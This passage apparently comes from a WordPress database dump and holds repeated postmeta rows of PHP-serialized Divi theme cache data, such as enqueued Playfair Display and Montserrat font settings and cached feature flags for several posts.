:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33804,749,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33799,1131,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33800,835,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33801,835,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33802,835,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33795,1346,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33796,1131,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33797,1131,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33798,1131,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33791,1199,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33792,1346,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33793,1346,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33794,1346,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33786,894,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33787,894,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33788,1199,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33789,1199,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33790,1199,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33781,574,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33782,574,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33783,574,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33784,894,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33785,894,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33777,568,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33778,568,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33779,568,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33780,574,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33776,568,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33772,567,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33773,567,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33774,567,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33775,567,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33768,566,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33769,566,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33770,566,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33771,566,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33767,564,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33759,560,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33760,562,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33761,562,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33762,562,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33763,562,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33764,564,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33765,564,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33766,564,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33755,559,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33756,560,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33757,560,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33758,560,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33751,556,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33752,559,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33753,559,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33754,559,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33743,553,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}